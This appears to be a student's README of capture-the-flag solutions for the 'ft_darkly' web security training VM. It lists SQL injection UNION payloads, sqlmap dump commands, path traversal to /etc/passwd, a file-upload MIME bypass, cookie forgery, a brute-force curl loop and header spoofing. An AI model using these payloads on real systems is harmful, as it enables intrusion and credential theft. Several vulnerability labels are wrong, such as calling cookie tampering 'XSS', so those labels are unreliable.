# ft_darkly

This project is an introduction to computer web security

#####  00 - Сross Site Request Forgery (CSRF - Redirection not safe)
    - http://192.168.30.129/index.php?page=redirect&site=facebook
    - http://192.168.30.129/index.php?page=redirect&site=admin (change by)

##### 01 - Cross-Site Scripting (Recover Password)
    - http://192.168.30.129/index.php?page=recover (Change hidden input mail by yours)
    - curl -s -X POST -d "mail=$2" -d "Submit=Submit" "$1/index.php?page=recover" &> /dev/null

##### 02 - Cross-Site Scripting (Cookie - Admin)
    - Change cookie 'I_am_admin'
    - 68934a3e9455fa72420237eb05902327 md5 == false
    - b326b5062b2f0e69046810717534cb09 md5 == true

##### 03 - Cross-Site Scripting (Invalid Vote)
    - Change vote to max int
    - http://192.168.30.129/?page=survey

##### 04 - SQL Injection (Members)
    - http://192.168.120.128/index.php?page=member
    - 0 OR 1 = 2 UNION SELECT table_schema, table_name FROM information_schema.TABLES (Get tables name in the DB)
    - 0 OR 1 = 2 UNION SELECT table_name, column_name FROM information_schema.COLUMNS (find table columns in the DB for each table)
    - sqlmap -u "http://192.168.2.128/?page=member&id=1&Submit=Submit#" --dump -T users
    
##### 05 - SQL Injection (Images)
    - http://192.168.2.128/?page=searchimg
    - 1 or 1=1 UNION select table_name, column_name FROM information_schema.columns
    - 1 or 1=1 UNION select url, comment from list_images
    - sqlmap -u "http://192.168.2.128/?page=searchimg&id=1&Submit=Submit#" --dump -T list_images -D Member_images
    
##### 06 - SQL Injection (LogIn)
    - http://192.168.120.128/index.php?page=member
    - 0 OR 1 = 2 UNION SELECT table_schema, table_name FROM information_schema.TABLES (Get tables name in the DB)
    - 0 OR 1 = 2 UNION SELECT table_name, column_name FROM information_schema.COLUMNS (find table columns in the DB for each table)
    - 0 OR 1 = 2 UNION SELECT username, password FROM Member_Brute_Force.db_default
    
###### 07 - Unrestricted File Upload
    - touch /tmp/test.php
	- curl -s -X POST -F "uploaded=@/tmp/test.php;type=image/jpeg" -F "Upload=Upload" "http://$1/index.php?page=upload" | grep 'flag'

##### 08 - Directory Transversal (include pages)
    - http://192.168.30.129/?page=../../../../../../../../etc/passwd
    - use python!
    
##### 09 - htaccess brake (root:login)
    - http://192.168.30.129/robots.txt
    - disallow: /whatever

##### 10 - Web - Crawler ()
    - http://192.168.180.128/.hidden/
    - need write crawler bot

##### 11 - XSS - Feedback()
    - http://192.168.120.128/?page=feedback
    -Inspect the element of the <input type = "text"> or Just type the word 'script' into one of the input
    -Remove the maxlength attribute
    -Write HTML code in this same input and submit

##### 12 - Login_bruteforce ()
    - Admin or root as login
    - Password pool: http://datanews.levif.be/ict/actualite/le-top-25-des-mots-de-passe-les-plus-courants-et-les-plus-faibles/article-normal-292823.html
    - for i in ${password[@]}; do curl -X POST "http://192.168.2.128/index.php?page=signin&username=admin&password=${i}&Login=Login#" | grep 'flag' done

##### 13 - XSS - Modify Headers ()
    - add referer = https://www.nsa.gov/ + User-Agent = ft_bornToSec
    - With Burp Proxy, edit the referer to put "https://www.nsa.gov/"and using a UserAgent editor addon, set the UserAgent on ft_bornToSec
